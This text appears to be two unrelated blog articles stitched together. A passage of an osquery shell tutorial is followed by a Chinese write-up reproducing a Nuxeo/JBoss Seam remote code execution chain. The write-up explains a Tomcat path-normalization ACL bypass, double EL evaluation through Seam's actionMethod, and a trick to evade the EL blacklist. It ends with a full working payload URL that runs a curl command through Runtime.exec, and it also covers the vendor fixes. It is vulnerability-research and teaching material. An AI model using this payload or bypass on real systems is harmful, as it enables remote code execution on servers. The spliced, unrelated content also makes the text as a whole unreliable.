osquery> .show
osquery - being built, with love, at Facebook

osquery 3.3.0
using SQLite 3.19.3

General settings:
     Flagfile: 
       Config: filesystem (/etc/osquery/osquery.conf)
       Logger: filesystem (/var/log/osquery/)
  Distributed: tls
     Database: ephemeral
   Extensions: core
       Socket: /home/xingjun/.osquery/shell.em

Shell settings:
         echo: off
      headers: on
         mode: pretty
    nullvalue: ""
       output: stdout
    separator: "|"
        width: 

Non-default flags/options:
  database_path: /home/xingjun/.osquery/shell.db
  disable_database: true
  disable_events: true
  disable_logging: true
  disable_watchdog: true
  extensions_socket: /home/xingjun/.osquery/shell.em
  hash_delay: 0
  logtostderr: true
  stderrthreshold: 3

The settings are grouped into General settings, Shell settings, and Non-default flags/options. The general settings mainly show the locations of the various files (configuration files, log directory). The shell settings include whether to print headers (headers), the display mode (mode: pretty), and the separator (separator: "|").

.tables lists all the tables supported on the current operating system. Although the schema documentation lists every table (covering Windows, macOS, and Linux), any given platform only exposes its own tables. Below is what I see on CentOS 7:

osquery> .table
  => acpi_tables
  => apt_sources
  => arp_cache
  => augeas
  => authorized_keys
  => block_devices
  => carbon_black_info
  => carves
  => chrome_extensions
  => cpu_time
  => cpuid
  => crontab
...

.schema [TABLE] shows the structure of a specific table, as follows:

osquery> .schema users
CREATE TABLE users(`uid` BIGINT, `gid` BIGINT, `uid_signed` BIGINT, `gid_signed` BIGINT, `username` TEXT, `description` TEXT, `directory` TEXT, `shell` TEXT, `uuid` TEXT, `type` TEXT HIDDEN, PRIMARY KEY (`uid`, `username`)) WITHOUT ROWID;
osquery> .schema processes
CREATE TABLE processes(`pid` BIGINT, `name` TEXT, `path` TEXT, `cmdline` TEXT, `state` TEXT, `cwd` TEXT, `root` TEXT, `uid` BIGINT, `gid` BIGINT, `euid` BIGINT, `egid` BIGINT, `suid` BIGINT, `sgid` BIGINT, `on_disk` INTEGER, `wired_size` BIGINT, `resident_size` BIGINT, `total_size` BIGINT, `user_time` BIGINT, `system_time` BIGINT, `disk_bytes_read` BIGINT, `disk_bytes_written` BIGINT, `start_time` BIGINT, `parent` BIGINT, `pgroup` BIGINT, `threads` INTEGER, `nice` INTEGER, `is_elevated_token` INTEGER HIDDEN, `upid` BIGINT HIDDEN, `uppid` BIGINT HIDDEN, `cpu_type` INTEGER HIDDEN, `cpu_subtype` INTEGER HIDDEN, `phys_footprint` BIGINT HIDDEN, PRIMARY KEY (`pid`)) WITHOUT ROWID;

The .schema commands above inspect the users and processes tables; the output is their corresponding DDL.

0x04 Basic usage

This section demonstrates using osqueryi to query operating-system information in real time (the queries below use .mode line for readability).

Viewing system information

osquery> select * from system_info;
          hostname = localhost
              uuid = 4ee0ad05-c2b2-47ce-aea1-c307e421fa88
          cpu_type = x86_64
       cpu_subtype = 158
         cpu_brand = Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz
cpu_physical_cores = 1
 cpu_logical_cores = 1
     cpu_microcode = 0x84
   physical_memory = 2924228608
   hardware_vendor = 
    hardware_model = 
  hardware_version = 
   hardware_serial = 
     computer_name = localhost.localdomain
    local_hostname = localhost

The results include the CPU model, core counts, memory size, computer name, and so on.

Viewing the OS version

osquery> select * from os_version;
         name = CentOS Linux
      version = CentOS Linux release 7.4.1708 (Core)
        major = 7
        minor = 4
        patch = 1708
        build = 
     platform = rhel
platform_like = rhel
     codename =

As shown, my machine runs CentOS Linux release 7.4.1708 (Core).

Viewing kernel information

osquery> SELECT * FROM kernel_info;
  version = 3.10.0-693.el7.x86_64
arguments = ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
     path = /vmlinuz-3.10.0-693.el7.x86_64
   device = /dev/mapper/centos-root

osquery> SELECT * FROM kernel_modules LIMIT 3;
   name = tcp_lp
   size = 12663
used_by = -
 status = Live
address = 0xffffffffc06cf000

   name = fuse
   size = 91874
used_by = -
 status = Live
address = 0xffffffffc06ae000

   name = xt_CHECKSUM
   size = 12549
used_by = -
 status = Live
address = 0xffffffffc06a9000

Querying repo and package information

osquery provides tables for querying the system's repo and package information: apt-related tables on Ubuntu, yum-related tables on CentOS. The examples here all use yum.

osquery> SELECT * FROM yum_sources  limit 2;
    name = CentOS-$releasever - Base
 baseurl = 
 enabled = 
gpgcheck = 1
  gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

    name = CentOS-$releasever - Updates
 baseurl = 
 enabled = 
gpgcheck = 1
  gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

The yum_sources table shows the operating system's yum source information directly.

osquery> SELECT name, version FROM rpm_packages order by name limit 3;
   name = GConf2
version = 3.2.6

   name = GeoIP
version = 1.5.0

   name = ModemManager
version = 1.6.0

rpm_packages lists the rpm packages installed on the system. We can also filter by name for the package we care about:

osquery> SELECT name, version FROM rpm_packages where name="osquery";
   name = osquery
version = 3.3.0

Mount information

The mounts table shows the system's mount information. For example:

SELECT * FROM mounts;
SELECT device, path, type, inodes_free, flags FROM mounts;

We can also use a where clause to query a specific filesystem type, such as ext4 or tmpfs:

osquery> SELECT device, path, type, inodes_free, flags FROM mounts WHERE type="ext4";
osquery> SELECT device, path, type, inodes_free, flags FROM mounts WHERE type="tmpfs";
     device = tmpfs
       path = /dev/shm
       type = tmpfs
inodes_free = 356960
      flags = rw,seclabel,nosuid,nodev

     device = tmpfs
       path = /run
       type = tmpfs
inodes_free = 356386
      flags = rw,seclabel,nosuid,nodev,mode=755

     device = tmpfs
       path = /sys/fs/cgroup
       type = tmpfs
inodes_free = 356945
      flags = ro,seclabel,nosuid,nodev,noexec,mode=755

     device = tmpfs
       path = /run/user/42
       type = tmpfs
inodes_free = 356955
      flags = rw,seclabel,nosuid,nodev,relatime,size=285572k,mode=700,uid=42,gid=42

     device = tmpfs
       path = /run/user/1000
       type = tmpfs
inodes_free = 356939
      flags = rw,seclabel,nosuid,nodev,relatime,size=285572k,mode=700,uid=1000,gid=1000

Memory information

Use memory_info to view memory information:

osquery> select * from memory_info;
memory_total = 2924228608
 memory_free = 996024320
     buffers = 4280320
      cached = 899137536
 swap_cached = 0
      active = 985657344
    inactive = 629919744
  swap_total = 2684350464
   swap_free = 2684350464

Network interface information

Use interface_addresses to view network interface information:

osquery> SELECT * FROM interface_addresses;
     interface = lo
       address = 127.0.0.1
          mask = 255.0.0.0
     broadcast = 
point_to_point = 127.0.0.1
          type = 

     interface = virbr0
       address = 192.168.122.1
          mask = 255.255.255.0
     broadcast = 192.168.122.255
point_to_point = 
          type = 

     interface = lo
       address = ::1
          mask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
     broadcast = 
point_to_point = 
          type =

interface_details provides even more detailed interface information.

SELECT * FROM interface_details;
SELECT interface, mac, ipackets, opackets, ibytes, obytes FROM interface_details;

The query results are as follows:

osquery> SELECT * FROM interface_details;
  interface = lo
        mac = 00:00:00:00:00:00
       type = 4
        mtu = 65536
     metric = 0
      flags = 65609
   ipackets = 688
   opackets = 688
     ibytes = 59792
     obytes = 59792
    ierrors = 0
    oerrors = 0
     idrops = 0
     odrops = 0
 collisions = 0
last_change = -1
 link_speed = 
   pci_slot = 
    ....

System uptime

osquery> select * from uptime;
         days = 0
        hours = 2
      minutes = 23
      seconds = 51
total_seconds = 8631

Querying user information

osquery provides several tables for querying user information: users lists all users on the system, last shows users' previous logins, and logged_in_users shows users with an active shell.

Use select * from users to view all users, and filters such as uid > 1000 to narrow them down:

osquery> select * from users where uid>1000;
        uid = 65534
        gid = 65534
 uid_signed = 65534
 gid_signed = 65534
   username = nfsnobody
description = Anonymous NFS User
  directory = /var/lib/nfs
      shell = /sbin/nologin
       uuid =

The last table holds recent login information, e.g. SELECT * FROM last;. Ordinary user logins have a type value of 7, so we can filter as follows:

osquery> SELECT * FROM last where type=7;
username = user
     tty = :0
     pid = 12776
    type = 7
    time = 1539882439
    host = :0

username = user
     tty = pts/0
     pid = 13754
    type = 7
    time = 1539882466
    host = :0

The time column is a Unix timestamp; converting it to a date gives the concrete login time.
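The conversion can even be done inside the query, since osqueryi supports SQLite's built-in date functions; a hypothetical example:

```sql
SELECT username, tty, datetime(time, 'unixepoch') AS login_time
FROM last WHERE type = 7;
```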

Use SELECT * FROM logged_in_users; to view the currently logged-in users.

Firewall information

The iptables table holds firewall information, e.g. select * from iptables;, and it can be filtered for specific rules, e.g. SELECT chain, policy, src_ip, dst_ip FROM iptables WHERE chain="POSTROUTING" order by src_ip;.

Process information

The processes table holds information about the processes on the system, including pid, name, path, command line, and so on. Use select * from processes;, or pick specific columns, e.g. select pid,name,path,cmdline from processes;:

osquery> select pid,name,path,cmdline from processes limit 2;
    pid = 1
   name = systemd
   path = 
cmdline = /usr/lib/systemd/systemd --switched-root --system --deserialize 21

    pid = 10
   name = watchdog/0
   path = 
cmdline =

Checking scheduled tasks

We can use the crontab table to inspect the system's scheduled tasks.

osquery> select * from crontab;
       event = 
      minute = 01
        hour = *
day_of_month = *
       month = *
 day_of_week = *
     command = root run-parts /etc/cron.hourly
        path = /etc/cron.d/0hourly

       event = 
      minute = 0
        hour = 1
day_of_month = *
       month = *
 day_of_week = Sun
     command = root /usr/sbin/raid-check
        path = /etc/cron.d/raid-check

Other tables

On Linux there are many other tables that can help with intrusion-detection work, including process_events, socket_events, process_open_sockets, and so on; these tables let us confirm suspected intrusions. How they work internally awaits further reading of the osquery source code.

0x04 Summary

This article introduced the basic features of osquery; its full power remains to be explored. Overall, osquery abstracts operating-system state into tables, which is a very elegant approach to baseline checks and system monitoring. Given these strengths, osquery can also be considered as a HIDS agent, though a HIDS built on osquery alone would clearly not be enough.

That is all.

Analysis of the Nuxeo RCE Vulnerability

Overview

This analysis of the Nuxeo RCE is based on Orange's post How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System (Chinese translation: 围观orange大佬在Amazon内部协作系统上实现RCE). Although Orange's post explains the vulnerability, it is hard to fully understand and appreciate without actually debugging it. Since Nuxeo's source code is hosted on GitHub, I decided to set up a Nuxeo instance myself and reproduce the whole chain.

Environment setup

The most troublesome part of the whole exercise was setting up the environment. Being unfamiliar with the system, I hit quite a few pitfalls.

Building from source

Since the source code is on GitHub, I first considered building the environment directly from the Nuxeo sources. After importing Nuxeo into IDEA I found more than ten modules and no obvious program entry point; after half a day of fiddling I still could not get it running.

Considering that the exploit also involves Nuxeo, JBoss-Seam, and Tomcat, I would have had to solve the deployment of all three by hand, and I found no documentation on running them together. Being unfamiliar with all three components, I abandoned the build-from-source approach.

Remote debugging with Docker

Later, after a classmate messaged Orange about his debugging setup, we learned he simply used Docker plus Eclipse remote debugging. The Nuxeo image downloaded from Docker runs out of the box, so remote debugging neatly solves the environment problem. The vulnerable version is on Nuxeo's branch 8. The setup steps are as follows:

  1. Pull the image. Pull the version-8 image from Docker: docker pull nuxeo:8.
  2. Enable debugging. Edit /opt/nuxeo/server/bin/nuxeo.conf and uncomment the line #JAVA_OPTS=$JAVA_OPTS -Xdebug -Xrunjdwp:transport=dt_socket,address=8787,server=y,suspend=n to turn on remote debugging.
  3. Install the module. In /opt/nuxeo/server, run ./bin/nuxeoctl mp-install nuxeo-jsf-ui (this component is involved in the exploit later).
  4. Export the source code. Remote debugging needs the code that lives inside the container; copying it to the host is straightforward:

    1. Inside the container, archive everything under /opt/nuxeo/server.
    2. Copy the archive from the container to the host.
  5. Run the Docker environment as a daemon.
  6. Import server/nxserver/nuxeo.war into IDEA; this war is the complete application. Then add the jars it depends on, taken from server/bin, server/lib, server/nxserver/bundles, and server/nxserver/lib. If the imported war shows no errors about missing jars, the import succeeded.
  7. Enable IDEA remote debugging against Docker. Go to Run/Edit Configurations and configure as follows:

2018-08-20-1.jpg

8. Import the dependency sources. Since we need to debug the nuxeo and jboss-seam packages, we must import the source code of the corresponding jars: apache-tomcat-7.0.69-src, nuxeo-8.10-SNAPSHOT, and jboss-seam-2-3-1.

With that, the vulnerability environment is complete.

Debugging the vulnerability

ACL bypass via a path-normalization error

ACL is short for Access Control List. Nuxeo's NuxeoAuthenticationFilter performs access checks on requested pages, which is a common development pattern. The essence of this bug is that Nuxeo canonicalizes non-canonical paths in a way that lets those access checks be bypassed.

As Orange notes, Nuxeo uses a custom authentication filter, NuxeoAuthenticationFilter, mapped to /*. Its configuration lives in WEB-INF/web.xml; an excerpt:

...
<filter-mapping>
    <filter-name>NuxeoAuthenticationFilter
      </filter-name>
    <url-pattern>/oauthGrant.jsp</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
    <filter-name>NuxeoAuthenticationFilter
      </filter-name>
    <url-pattern>/oauth/*</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
...

However, login.jsp is not covered by NuxeoAuthenticationFilter (which makes sense: a login page normally needs no authentication check). This is the entry point for the rest of the exploit.

Let us analyze the access check in org.nuxeo.ecm.platform.ui.web.auth.NuxeoAuthenticationFilter::bypassAuth().

protected boolean bypassAuth(HttpServletRequest httpRequest) {
...
    try {
        unAuthenticatedURLPrefixLock.readLock().lock();
        String requestPage = getRequestedPage(httpRequest);
        for (String prefix : unAuthenticatedURLPrefix) {
            if (requestPage.startsWith(prefix)) {
                return true;
            }
        }
    }
....

As Orange explains:

As shown above, bypassAuth retrieves the currently requested page and compares it against unAuthenticatedURLPrefix. But how does bypassAuth retrieve the current requested page? Nuxeo wrote a method that extracts the requested page from HttpServletRequest.RequestURI, and the first problem appears right here!

Stepping into it:

protected static String getRequestedPage(HttpServletRequest httpRequest) {
    String requestURI = httpRequest.getRequestURI();
    String context = httpRequest.getContextPath() + '/';
    String requestedPage = requestURI.substring(context.length());
    int i = requestedPage.indexOf(';');
    return i == -1 ? requestedPage : requestedPage.substring(0, i);
}
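A minimal Python re-implementation of this Java method (a simulation, not Nuxeo code) shows how everything after the first ; is dropped:

```python
# Simulate NuxeoAuthenticationFilter.getRequestedPage(): strip the context path,
# then truncate at the first ';' (the path-parameter separator).
def get_requested_page(request_uri: str, context_path: str) -> str:
    context = context_path + "/"
    requested = request_uri[len(context):]
    i = requested.find(";")
    return requested if i == -1 else requested[:i]

# Nuxeo sees only the whitelisted "login.jsp" for the malicious URI.
print(get_requested_page("/nuxeo/login.jsp;/..;/oauth2Grant.jsp", "/nuxeo"))  # login.jsp
```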

getRequestedPage()'s path handling is simple: if the path contains a ;, everything after the ; is stripped. That is all on Nuxeo's side, but behind Nuxeo sits a web server, and different web servers may handle paths differently. As Orange puts it:

Every web server has its own implementation. Nuxeo's approach may be safe in containers such as WildFly, JBoss, and WebLogic, but it breaks under Tomcat! The discrepancy between the getRequestedPage method and the servlet container therefore leads to a security issue!

Exploiting this truncation, we can forge a request that matches the ACL whitelist yet reaches an unauthorized area of the servlet!

A slide borrowed from Orange's deck illustrates this:

2018-08-20-2.jpg

We run the following tests:

  1. Accessing a URL that requires authentication, oauth2Grant.jsp, ends in a 302:

2018-08-20-3.jpg

  2. Accessing the malformed URL http://172.17.0.2:8080/nuxeo/login.jsp;/..;/oauth2Grant.jsp ends in a 500:

2018-08-20-4.jpg

The 500 arises because, once the request reaches Tomcat, the servlet logic cannot obtain valid user information and throws a Java NullPointerException; but http://172.17.0.2:8080/nuxeo/login.jsp;/..;/oauth2Grant.jsp has already bypassed the ACL.

How Tomcat normalizes the path

Strictly speaking, knowing how Tomcat treats the path would suffice and this step could be skipped, but since the bug exists, let us take the opportunity to walk through Tomcat's source as well.

Based on existing source-level write-ups of how Tomcat parses URLs, its internal structure and request flow, such as [Servlet容器Tomcat中web.xml中url-pattern的配置详解(附带源码分析)](https://www.cnblogs.com/fangjian0423/p/servletContainer-tomcat-urlPattern.html), Tomcat processes a request URL as follows:

2018-08-20-5.png

Tomcat consists of Connectors and Containers. The Connector's most important job is to accept a connection request and assign a thread so that the Container can process it. The Container is built from four nested sub-containers: Engine, Host, Context, and Wrapper, each containing the next. When Tomcat receives a request, the Container resolves it down this chain, setting the Host, Context, and Wrapper. The roles of these components are:

2018-08-20-6.jpg

We first look at the URL handling in org.apache.catalina.connector.CoyoteAdapter::postParseRequest():

  1. After convertURI(decodedURI, request); inside postParseRequest(), the req object gains a decodedUriMB field whose value is /nuxeo/oauth2Grant.jsp.

2018-08-20-7.jpg

  2. After decodedUriMB is parsed, the connector sets the related attributes:

    connector.getMapper().map(serverName, decodedURI, version,request.getMappingData());
    request.setContext((Context) request.getMappingData().context);
    request.setWrapper((Wrapper) request.getMappingData().wrapper);
  3. Execution then enters internalMapWrapper() in org.apache.tomcat.util.http.mapper.Mapper, which selects the matching wrapper (the wrapper corresponds to the servlet that will handle the request). internalMapWrapper() populates every attribute of mappingData, including wrapperPath, which is what getServletPath() later returns.

2018-08-20-9.jpg

  4. Finally the URL is handled in org.apache.jasper.servlet.JspServlet::service(). The function looks like this:

    public void service (HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        ...
        jspUri = request.getServletPath();
        String pathInfo = request.getPathInfo();
        if (pathInfo != null) {
            jspUri += pathInfo;
        }
    
        try {
            boolean precompile = preCompile(request);
            serviceJspFile(request, response, jspUri, precompile);
        } catch (RuntimeException e) {
            throw e;
        } catch (ServletException e) {
            throw e;
        }
        ...
    }

Inside the function, the URL is obtained via jspUri = request.getServletPath();. Tracing the call chain down, the value ultimately comes from org.apache.catalina.connector.Request::getServletPath():

public String getServletPath() {
    return (mappingData.wrapperPath.toString());
}

The result is /oauth2Grant.jsp.
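The mismatch can be sketched in a few lines of Python (a simulation, with posixpath.normpath standing in for Tomcat's normalization): Tomcat strips each segment's path parameters (the ;... part) and then collapses the /.. segments, so it resolves a servlet path that Nuxeo's ACL never saw.

```python
from posixpath import normpath

# Simulate Tomcat's view of the URI: drop per-segment path parameters (";..."),
# normalize "/.." segments, then strip the context path to get the servlet path.
def tomcat_servlet_path(request_uri: str, context_path: str) -> str:
    no_params = "/".join(seg.split(";", 1)[0] for seg in request_uri.split("/"))
    return normpath(no_params)[len(context_path):]

# Tomcat resolves the malicious URI to the protected servlet.
print(tomcat_servlet_path("/nuxeo/login.jsp;/..;/oauth2Grant.jsp", "/nuxeo"))  # /oauth2Grant.jsp
```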

Finally the program runs serviceJspFile(request, response, jspUri, precompile);, executing the servlet behind oauth2Grant.jsp. Because the request reached oauth2Grant.jsp without ever passing authentication, the servlet cannot obtain the user's credentials and throws an error.

2018-08-20-10.jpg

This is why our earlier request to http://172.17.0.2:8080/nuxeo/login.jsp;/..;/oauth2Grant.jsp returned a 500 java.lang.NullPointerException.

Code reuse allows partial EL invocation

Thanks to the path-parsing mismatch between Nuxeo and Tomcat, we can now reach any servlet. The next task is to reach an unauthenticated Seam servlet that can trigger the bug. As Orange says:

actionMethod is a special parameter that can invoke specific JBoss EL (Expression Language) from the query string.

actionMethod is handled by org.jboss.seam.navigation.Pages::callAction:

private static boolean callAction(FacesContext facesContext) {
    //TODO: refactor with Pages.instance().callAction()!!
    boolean result = false;
    String actionId = facesContext.getExternalContext().getRequestParameterMap().get("actionMethod");
    if (actionId!=null)
    {
    String decodedActionId = URLDecoder.decode(actionId);
    if (decodedActionId != null && (decodedActionId.indexOf('#') >= 0 || decodedActionId.indexOf('{') >= 0) ){
        throw new IllegalArgumentException("EL expressions are not allowed in actionMethod parameter");
    }
    if ( !SafeActions.instance().isActionSafe(actionId) ) return result;
    String expression = SafeActions.toAction(actionId);
    result = true;
    MethodExpression actionExpression = Expressions.instance().createMethodExpression(expression);
    outcome = toString( actionExpression.invoke() );
    fromAction = expression;
    handleOutcome(facesContext, outcome, fromAction);
    }    
    return result;
}

Here actionId holds the content of the actionMethod parameter. callAction is simple overall: it extracts an expression (an EL expression) from actionId, evaluates it via actionExpression.invoke(), and finally hands the result to handleOutcome(). The problem is that handleOutcome() can itself evaluate EL expressions. Of course, actionMethod does not let you evaluate arbitrary EL; the method performs some safety checks, including SafeActions.instance().isActionSafe(actionId). Stepping into org.jboss.seam.navigation.SafeActions::isActionSafe():

public boolean isActionSafe(String id){
    if ( safeActions.contains(id) ) return true;
    int loc = id.indexOf(':');
    if (loc<0) throw new IllegalArgumentException("Invalid action method " + id);
    String viewId = id.substring(0, loc);
    String action = "\"#{" + id.substring(loc+1) + "}\"";
    // adding slash as it otherwise won't find a page viewId by getResource*
    InputStream is = FacesContext.getCurrentInstance().getExternalContext().getResourceAsStream("/" +viewId);
    if (is==null) throw new IllegalStateException("Unable to read view " + "/" + viewId + " to execute action " + action);
    BufferedReader reader = new BufferedReader( new InputStreamReader(is) );
    try {
        while ( reader.ready() ) {
            if ( reader.readLine().contains(action) ) {
                addSafeAction(id);
                return true;
            }
        }
        return false;
    }
// catch exception
}

:作为分隔符对id进行分割得到viewIdaction,其中viewId就是一个存在的页面,而action就是EL表达式。reader.readLine().contains(action)这行代码的含义就是在viewId页面中必须存在action表达式。我们以一个具体的例子来进行说明。login.xhtml为例进行说明,这个页面刚好存在<td><h:inputText name="j_username" value="#{userDTO.username}" /></td>表达式。以上的分析就说明了为什么需要满足orange的三个条件了。

  1. The actionMethod value must be a pair of the form FILENAME:EL_CODE
  2. The FILENAME part must be a real file under the context root
  3. The file FILENAME must contain the text "#{EL_CODE}" (the double quotes are required)

Take for example the URL http://172.17.0.2:8080/nuxeo/login.jsp;/..;/create_file.xhtml?actionMethod=login.xhtml:userDTO.username: the pair login.xhtml:userDTO.username satisfies the first requirement; login.xhtml really exists, satisfying the second; and "#{userDTO.username}" satisfies the third.
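The check can be sketched in Python (a simulation of the Java isActionSafe() above; the views dict is a hypothetical stand-in for reading real .xhtml files from the context root):

```python
# Simulate Seam's isActionSafe(): the part after ':' must appear in the named
# view file wrapped as "#{...}" — double quotes included.
def is_action_safe(action_id, read_view):
    view_id, sep, expr = action_id.partition(":")
    if not sep:
        raise ValueError("Invalid action method " + action_id)
    needle = '"#{' + expr + '}"'
    return any(needle in line for line in read_view(view_id))

# Stand-in for the real login.xhtml on disk.
views = {"login.xhtml": ['<h:inputText name="j_username" value="#{userDTO.username}" />']}
print(is_action_safe("login.xhtml:userDTO.username", lambda v: views[v]))  # True
print(is_action_safe("login.xhtml:evil.expression", lambda v: views[v]))  # False
```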

Double evaluation leads to EL injection

This looks quite safe: only EL expressions that already appear in pages can be executed, attacker-defined expressions cannot, and the expressions developers put in pages rarely contain anything like an RCE. But all of that holds only in the ideal case. As analyzed earlier, callAction() ends by calling handleOutcome(facesContext, outcome, fromAction) to further process the result of the EL evaluation; if that result is itself an expression, handleOutcome() evaluates it again. A doubled EL evaluation thus becomes EL injection.

Let us trace the execution flow of handleOutcome():

  1. handleOutcome() is invoked from org.jboss.seam.navigation.Pages::callAction();
  2. org.jboss.seam.navigation.Pages::handleOutcome();
  3. org.nuxeo.ecm.platform.ui.web.rest.FancyNavigationHandler::handleNavigation();
  4. org.jboss.seam.jsf.SeamNavigationHandler::handleNavigation();
  5. org.jboss.seam.core.Interpolator::interpolate();
  6. In org.jboss.seam.core.Interpolator::interpolateExpressions(), the EL expression is finally evaluated via Object value = Expressions.instance().createValueExpression(expression).getValue();.

The crux is finding an xhtml page that lets us perform the double EL evaluation. Following Orange's article, that page is widgets/suggest_add_new_directory_entry_iframe.xhtml:

  <nxu:set var="directoryNameForPopup"
    value="#{request.getParameter('directoryNameForPopup')}"
    cache="true">
....

It contains the EL expression #{request.getParameter('directoryNameForPopup')}, which fetches the content of the directoryNameForPopup parameter (this is the first EL evaluation). If directoryNameForPopup itself holds an EL expression, we achieve the double-EL injection.
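A toy model of the double evaluation (a simulation, not Seam's real EL engine — the evaluate function below is a hypothetical stand-in): the first pass merely echoes a request parameter, and handleOutcome() then interpolates the result, so an attacker-supplied expression gets evaluated on the second pass.

```python
import re

# Stand-in for the EL engine: "#{request.getParameter('x')}" returns params['x'];
# anything else is "evaluated" (the dangerous second pass).
def evaluate(expr, params):
    m = re.fullmatch(r"#\{request\.getParameter\('(\w+)'\)\}", expr)
    if m:
        return params[m.group(1)]           # first pass: echo the parameter
    return "<evaluated: " + expr + ">"      # second pass: evaluate the result

params = {"directoryNameForPopup": "#{7*7}"}  # attacker-controlled value
outcome = evaluate("#{request.getParameter('directoryNameForPopup')}", params)
print(outcome)                    # still an expression: #{7*7}
print(evaluate(outcome, params))  # the attacker's input is evaluated in turn
```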

With that, the whole attack chain is complete.

Double EL evaluation leads to RCE

Note that Seam 2.3.1 ships an EL blacklist, located at org/jboss/seam/blacklist.properties, with the following contents:

.getClass(
.class.
.addRole(
.getPassword(
.removeRole(
session['class']
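This blacklist is a plain substring filter, which is exactly why it can be sidestepped, as the next paragraph shows. A minimal sketch (the entries copied from the listing above):

```python
# The Seam blacklist is matched as plain substrings against the EL expression.
blacklist = [".getClass(", ".class.", ".addRole(", ".getPassword(",
             ".removeRole(", "session['class']"]

def blocked(expr):
    return any(entry in expr for entry in blacklist)

print(blocked('"".getClass().forName("java.lang.Runtime")'))  # True: caught
print(blocked('""["class"].forName("java.lang.Runtime")'))    # False: slips past
```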

The blacklist makes it impossible to obtain the class via "".getClass().forName("java.lang.Runtime"), but the check can be evaded with array-style access: ""["class"].forName("java.lang.Runtime"). With the blacklist out of the way, we can reflectively load the java.lang.Runtime class and proceed to the RCE. Let us recap the whole attack chain:

  1. Use the path-normalization flaw in Nuxeo's bypassAuth to get past the NuxeoAuthenticationFilter access checks;
  2. Use Tomcat's path handling to reach an arbitrary servlet;
  3. Use callAction in jboss-seam, reachable through actionMethod, to invoke EL expressions that already exist in any xhtml file;
  4. Point actionMethod at widgets/suggest_add_new_directory_entry_iframe.xhtml, whose parameter we control;
  5. Set that page's directoryNameForPopup parameter (read via request.getParameter('directoryNameForPopup')) to an EL payload that performs the RCE;
  6. org.jboss.seam.navigation.Pages::callAction performs the double EL evaluation, yielding the RCE.

Our final payload is:

http://172.17.0.2:8080/nuxeo/login.jsp;/..;/create_file.xhtml?actionMethod=widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')&directoryNameForPopup=/?key=#{''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898')}

Here 172.17.0.1 is the IP address of my host machine. In this build, ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7] resolves to the static getRuntime() (hence the invoke(null)), and ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15] resolves to exec(java.lang.String); note that these indices depend on the JVM. The RCE finally succeeds.

2018-08-20-11.jpg

Fixes

Nuxeo's fix

The Nuxeo side of the vulnerability comes from the ACL bypass caused by the path-normalization mismatch with Tomcat. It was fixed in NXP-24645: fix detection of request page for login. The fix:

2018-08-20-12.jpg

The requested page is now obtained via httpRequest.getServletPath();, consistent with Tomcat, so the ACL can no longer be bypassed and the normalization mismatch with Tomcat disappears.

Seam's fix

Seam was fixed in two places: NXP-24606: improve Seam EL blacklist and NXP-24604: don't evalue EL from user input.
The blacklist gained new entries:

2018-08-20-13.jpg

These include .forName(, so classes can no longer be loaded reflectively via .forName(.

The handling in callAction() was also changed, as follows:

2018-08-20-14.jpg

The patched callAction() does no processing at all and simply returns false, never evaluating any EL expression.

Summary

Writing all this down, I realize it does not differ much from Orange's post, but debugging it by hand was still hugely rewarding. The construction of this attack chain is genuinely exquisite:

  1. It fully exploits Nuxeo's ACL bypass: the divergence from Tomcat's URL normalization gives access to arbitrary servlets.
  2. It uses Seam's actionMethod to point at any EL expression inside any xhtml file.
  3. It abuses callAction()'s handling of EL results to execute a double EL evaluation.